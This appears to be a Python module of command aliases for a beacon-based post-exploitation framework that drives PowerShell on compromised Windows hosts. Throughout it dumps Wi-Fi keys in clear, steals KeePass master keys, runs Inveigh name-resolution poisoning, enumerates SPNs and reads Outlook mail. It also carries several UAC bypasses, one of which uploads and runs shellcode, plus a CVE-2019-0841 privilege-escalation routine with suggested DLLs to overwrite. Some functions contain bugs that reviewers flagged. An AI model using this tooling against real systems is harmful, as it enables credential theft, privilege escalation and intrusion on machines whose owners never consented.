def _(bid, profile):
    """Export one saved WLAN profile (key material in clear) on the beacon host and filter the XML.

    Args:
        bid: beacon id passed through to the aggressor API.
        profile: WLAN profile name substituted into the command below; it is
            interpolated without quoting, so it must be a trusted value.
    """
    # NOTE(review): this looks like an earlier draft of the `profile=None`
    # variant further down, which binds `$profile` before removing it. Here
    # `$profile` is never assigned, so `rm $profile ...` acts on whatever
    # PowerShell already holds in that variable (presumably the automatic
    # profile-path variable) — confirm before using this version.
    # NOTE(review): the stray "'" after `key=clear` and the `$env:temp:\` path
    # spelling also look like typos inherited from the draft.
    command = """
    netsh wlan export profile name="{name}" folder=$env:temp key=clear'
    get-content $env:temp:\*{name}*.xml | select-string -pattern '(keyMaterial)|(keyType)'
    rm $profile $env:temp:\*{name}*.xml
    """.format(name=profile)
    aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False):
    """Dispatch `program` to one of the registered backends and run it on the beacon.

    The lookup order is the module-level `assemblies`, `powershell` and
    `callbacks` tables (all defined elsewhere in this file).

    Args:
        bid: beacon id.
        program: key into one of the three tables.
        args: optional argument list; a falsy value becomes an empty list.
        silent: suppresses the btask message for assemblies and is forwarded to
            callbacks; the PowerShell branch does not read it.

    Raises:
        RuntimeError: if `program` is in none of the tables.
    """
    # no args
    if not args:
        args = []
    if program in assemblies:
        assembly = assemblies[program]
        # helpers.eaq presumably quotes the list for execute-assembly — not visible here
        args = helpers.eaq(args)
        if not silent:
            aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args))
        # the beacon call is always silent; the btask above is the only user-visible message
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)
        if isinstance(args, list) or isinstance(args, tuple):
            args = ' '.join(powershell_quote(args))
        # NOTE(review): at this point `args` is a str (either joined above or
        # passed in as one), so `' '.join(args)` inserts a space between every
        # character of it — confirm whether this is intended.
        aggressor.bpowerpick(bid, ' '.join(args))
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))
def _(bid):
    """List the contents of %LOCALAPPDATA% and %APPDATA% on the beacon host.

    Args:
        bid: beacon id.
    """
    command = textwrap.dedent("""
    ls $env:localappdata
    ls $env:appdata
    """)
    aggressor.bpowerpick(bid, command)
def _(bid, runtime=99999, *args):
    """Import the bundled Inveigh script and start it with the fixed switches below.

    Args:
        bid: beacon id.
        runtime: value substituted into Inveigh's -RunTime switch.
        *args: extra tokens appended to the command line verbatim (no quoting).
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
    aggressor.bpowerpick(
        bid,
        "Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
        .format(runtime, ' '.join(args)))
def _(bid):
    """Print the OS caption and the installed hotfix list (wmic) on the beacon host.

    Args:
        bid: beacon id.
    """
    # not dedented: the leading whitespace of each line is sent as-is
    command = """
    wmic os get Caption /value | more
    wmic qfe
    """
    aggressor.bpowerpick(bid, command)
def _(bid):
    """List the Desktop, Documents and Downloads folders of the current user profile.

    Args:
        bid: beacon id.
    """
    command = ''
    for d in ['Desktop', 'Documents', 'Downloads']:
        # one `ls` per folder; '\\' is a literal backslash in the PowerShell path
        command += 'ls $env:userprofile\\{}\n'.format(d)
    aggressor.bpowerpick(bid, command)
def _(bid):
    """List the contents of %LOCALAPPDATA% and %APPDATA% on the beacon host.

    Same command as the textwrap.dedent variant of this alias, built through
    helpers.code_string instead.

    Args:
        bid: beacon id.
    """
    command = helpers.code_string("""
    ls $env:localappdata
    ls $env:appdata
    """)
    aggressor.bpowerpick(bid, command)
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    Uploads three files into the beacon's guessed temp directory (two bundled
    helper executables plus `shellcode`), runs Invoke-TokenDuplication against
    the second helper, then removes all three uploads.

    Args:
        bid: beacon id.
        shellcode: local path handed to helpers.upload_to; it lands on the
            beacon host as `nuget.package`.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))
    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')
    # remote paths; helpers.guess_temp is called once per path
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)
    command = 'Invoke-TokenDuplication -Binary {}'.format(
        powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)
    # NOTE(review): the removals are queued right after the bpowerpick call;
    # whether the beacon orders them after the PowerShell job finishes is not
    # visible here — confirm.
    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
def _(bid):
    """Print the OS caption and the installed hotfix list (wmic) on the beacon host.

    Args:
        bid: beacon id.
    """
    command = textwrap.dedent("""
    wmic os get Caption /value | more
    wmic qfe
    """)
    # the btask line is the user-visible message; the job itself runs silent
    aggressor.btask(bid, 'Tasked beacon to get patch status')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
    """List the Desktop, Documents, Downloads and Favorites folders of the current user profile.

    Args:
        bid: beacon id.
    """
    command = ''
    for d in ['Desktop', 'Documents', 'Downloads', 'Favorites']:
        # one `ls` per folder; '\\' is a literal backslash in the PowerShell path
        command += 'ls $env:userprofile\\{}\n'.format(d)
    aggressor.btask(bid, 'Tasked beacon to show common document folders')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
    """List the contents of %LOCALAPPDATA% and %APPDATA% on the beacon host.

    Args:
        bid: beacon id.
    """
    command = textwrap.dedent("""
    ls $env:localappdata
    ls $env:appdata
    """)
    aggressor.btask(bid, 'Tasked beacon to show AppData')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
    """Build and run an Outlook COM query on the beacon host from command-line style options.

    The PowerShell prologue comes from the module-level `outlook()` helper (not
    visible here); it is assumed to define `$namespace` and `$folders`.

    Args:
        bid: beacon id.
        *args: option tokens parsed by helpers.ArgumentParser (-f, -s, -t, -d, -o).
    """
    parser = helpers.ArgumentParser(bid=bid, prog='outlook')
    parser.add_argument('-f', '--folder', help='Folder name to grab')
    parser.add_argument('-s', '--subject', help='Match subject line (glob)')
    parser.add_argument('-t', '--top', metavar='N', type=int, help='Only show top N results')
    parser.add_argument('-d', '--dump', action='store_true', help='Get full dump')
    parser.add_argument('-o', '--out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        # NOTE(review): bare except also swallows non-parse errors; presumably
        # the parser reports usage to the beacon console itself — confirm.
        return
    command = ''
    command += outlook()
    # -f/--folder
    if args.folder:
        # specified folder
        #folder = args.folder.lstrip('\\')
        # NOTE(review): `folder` is not bound anywhere in this function (the
        # only assignment is commented out), so this branch raises NameError.
        command += helpers.code_string(r"""
        $folder = $namespace.Folders.Item("{}")
        """.format(folder))
    else:
        # inbox
        command += helpers.code_string(r"""
        $folder = $namespace.getDefaultFolder($folders::olFolderInBox)
        """)
    command += helpers.code_string(r"""
    $folder.items""")
    # -s/--subject
    if args.subject:
        # value is interpolated unquoted into the PowerShell filter
        command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format(
            args.subject)
    # -t/--top
    if args.top:
        command += ' | select -First {}'.format(args.top)
    # -d/--dump
    if not args.dump:
        # print summary only
        #command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress'
        command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress'
    # -o/--out
    if args.out:
        # redirect target is appended as given (no powershell_quote here)
        command += ' > {}'.format(args.out)
    aggressor.bpowerpick(bid, command)
def _(bid):
    """Print the beacon process's environment variables sorted by name.

    Args:
        bid: beacon id.
    """
    command = helpers.code_string(r"""
    Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto
    """)
    aggressor.bpowerpick(bid, command)
def _(bid):
    """List processes that own a main window (id, name, window title).

    Args:
        bid: beacon id.
    """
    command = helpers.code_string(r"""
    Get-Process | Where { $_.mainWindowTitle } | Format-Table id,name,mainwindowtitle -AutoSize
    """)
    aggressor.btask(bid, 'Tasked beacon to list open windows')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *command):
    """Join the command tokens and run them through the saved original bpowerpick, if any.

    `_old_bpowerpick` is a module-level binding set elsewhere in this file;
    when it is falsy the call falls back to aggressor.bpowerpick directly.

    Args:
        bid: beacon id.
        *command: tokens joined with single spaces.
    """
    # `global` is only needed for assignment; this function only reads the name
    global _old_bpowerpick
    command = ' '.join(command)
    if _old_bpowerpick:
        _old_bpowerpick(bid, command)
    else:
        aggressor.bpowerpick(bid, command)
def _(bid):
    """List installed software from the 32-bit Uninstall registry key, sorted by name.

    Args:
        bid: beacon id.
    """
    command = textwrap.dedent(r"""
    Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, InstallDate | Sort-Object -Property DisplayName | Format-Table -AutoSize
    """)
    aggressor.bpowerpick(bid, command)
def _(bid):
    """Import the bundled KeePassConfig and KeeThief scripts and run one command from each.

    Args:
        bid: beacon id.
    """
    # KeePassConfig
    aggressor.bpowershell_import(bid, utils.basedir('powershell/KeePassconfig.ps1'))
    aggressor.bpowerpick(bid, "Find-KeePassconfig")
    # KeeThief
    aggressor.bpowershell_import(bid, utils.basedir('powershell/KeeThief.ps1'))
    aggressor.bpowerpick(bid, "Get-KeePassDatabaseKey -Verbose")
def _(bid, pattern, out=None):
    """Run Get-IndexedFiles with `pattern`, optionally redirecting output to a file.

    `import_host_recon` is defined elsewhere in this file and is assumed to
    import the script that provides Get-IndexedFiles.

    Args:
        bid: beacon id.
        pattern: search pattern, quoted with powershell_quote.
        out: optional remote output path, quoted with powershell_quote.
    """
    import_host_recon(bid)
    command = 'Get-IndexedFiles {}'.format(powershell_quote(pattern))
    if out:
        # output to file
        command += ' > {}'.format(powershell_quote(out))
    aggressor.bpowerpick(bid, command)
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass.

    Args:
        bid: beacon id.
        command: command string handed to Invoke-SluiBypass -Command, quoted
            with powershell_quote.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))
    aggressor.bpowerpick(
        bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid):
    """Print the beacon process's environment variables sorted by name.

    Args:
        bid: beacon id.
    """
    command = textwrap.dedent(r"""
    Get-Childitem -path env:* | Select-Object Name, Value | Sort-Object name | Format-Table -Auto
    """)
    aggressor.btask(bid, 'Tasked beacon to get environmental variables')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
    """Recursively list one or more directories on the beacon host.

    Args:
        bid: beacon id.
        *dirs: directories to list; defaults to the current directory. Each
            is placed inside double quotes without further escaping.
    """
    # default dir is .
    if not dirs:
        dirs = ['.']
    command = ''
    for d in dirs:
        command += 'Get-ChildItem -Recurse "{}"\n'.format(d)
    aggressor.bpowerpick(bid, command)
def _(bid, *dirs):
    """Recursively and forcibly remove one or more directories on the beacon host.

    Unlike the recursive-list alias, there is deliberately no default: with no
    arguments an error is reported and nothing is run.

    Args:
        bid: beacon id.
        *dirs: directories to remove; each is placed inside double quotes
            without further escaping.
    """
    if not dirs:
        aggressor.berror('rmr: specify some directories to kill')
        return
    command = ''
    for d in dirs:
        command += 'Remove-Item -Recurse -Force "{}"\n'.format(d)
    aggressor.bpowerpick(bid, command)
def _(bid, out=None):
    """Import the bundled UserSPN script and run Get-AccountSPNs, optionally to a file.

    Args:
        bid: beacon id.
        out: optional remote output path, quoted with powershell_quote.
    """
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))
    command = 'Get-AccountSPNs'
    if out:
        # output to file
        command += ' > {}'.format(powershell_quote(out))
    aggressor.bpowerpick(bid, command)
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass.

    Args:
        bid: beacon id.
        command: command string handed to Invoke-WScriptBypassUAC -payload,
            quoted with powershell_quote.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1'))
    aggressor.bpowerpick(
        bid, 'Invoke-WScriptBypassUAC -payload {}'.format(
            powershell_quote(command)))
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass.

    Args:
        bid: beacon id.
        command: command string handed to Invoke-EventVwrBypass -Command,
            quoted with powershell_quote.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1'))
    aggressor.bpowerpick(
        bid, 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
    overwrite 'target' with 'overwrite'.

    Good overwrite options:
    - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
    - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)

    Args:
        bid: beacon id.
        target: remote path; quoted with powershell_quote before being
            interpolated into the script below.
        overwrite: optional local path; when given it is uploaded over
            `target` with helpers.upload_to and helpers.explorer_stomp is run
            on the result.
    """
    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
    # glob; resolved on the beacon host by Resolve-Path inside the script
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'
    # doubled braces are literal braces for str.format
    command = helpers.code_string(r"""
    # Stop Edge
    echo "[.] Stopping Edge"
    $process = Get-Process -Name MicrosoftEdge 2>$null
    if ($process) {{ $process | Stop-Process }}
    sleep 3
    # Hardlink
    $edge_dir = Resolve-Path {edge_dir}
    $settings_dat = $edge_dir.Path + '{settings_dat}'
    echo "[.] Making Hardlink from $settings_dat to {target}"
    rm $settings_dat
    Native-HardLink -Verbose -Link $settings_dat -Target {target}
    # Start Edge
    echo "[.] Starting Edge"
    Start Microsoft-Edge:
    sleep 3
    # Stop it again
    echo "[.] Stopping Edge"
    $process = Get-Process -Name MicrosoftEdge 2>$null
    if ($process) {{ $process | Stop-Process }}
    echo "[+] All Finished!"
    echo "[.] New ACLs:"
    Get-Acl {target} | Format-List
    """.format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target)))
    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)
    if overwrite:
        helpers.upload_to(bid, overwrite, target)
        helpers.explorer_stomp(bid, target)
def _(bid):
    """Report whether the beacon's current identity is in the local Administrators role.

    Args:
        bid: beacon id.
    """
    command = helpers.code_string(r"""
    if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
        echo "User is a local admin!";
    } else {
        echo "User is not local admin :(";
    }
    """)
    aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
    """Report whether the beacon host is domain-joined (Win32_ComputerSystem.PartOfDomain).

    Args:
        bid: beacon id.
    """
    command = helpers.code_string(r"""
    If ((gwmi win32_computersystem).partofdomain){
        Write-Output "User is in domain: $env:userdomain"
    } Else {
        Write-Output "User is not in a domain"
    }
    """)
    aggressor.btask(bid, "Tasked beacon to check if it's in a domain")
    aggressor.bpowerpick(bid, command, silent=True)
def _(bid, profile=None):
    """Show saved WLAN profiles on the beacon host with their keys in clear.

    With `profile`, one profile is exported to %TEMP%, printed and the export
    removed; without it, `netsh wlan show profiles` is run via bshell.

    Args:
        bid: beacon id.
        profile: optional profile name; interpolated without quoting, so it
            must be a trusted value.
    """
    if profile:
        # NOTE(review): `$env:temp:\*` keeps the odd ':' from the earlier draft
        # of this alias — confirm the path resolves as intended.
        command = helpers.code_string("""
        netsh wlan export profile name="{name}" folder=$env:temp key=clear
        $profile = $env:temp:\*{name}*.xml
        get-content $profile
        rm $profile
        """.format(name=profile))
        aggressor.bpowerpick(bid, command)
    else:
        aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid):
    """Print the OS caption and the installed hotfixes, newest first (WMI Win32_QuickFixEngineering).

    Args:
        bid: beacon id.
    """
    command = helpers.code_string(r"""
    wmic os get Caption /value
    Get-WmiObject -class Win32_quickfixengineering | Select-Object HotFixID,Description,InstalledBy,InstalledOn | Sort-Object InstalledOn -Descending | Format-Table -Auto
    """)
    aggressor.btask(bid, 'Tasked beacon to get patch info')
    aggressor.bpowerpick(bid, command, silent=True)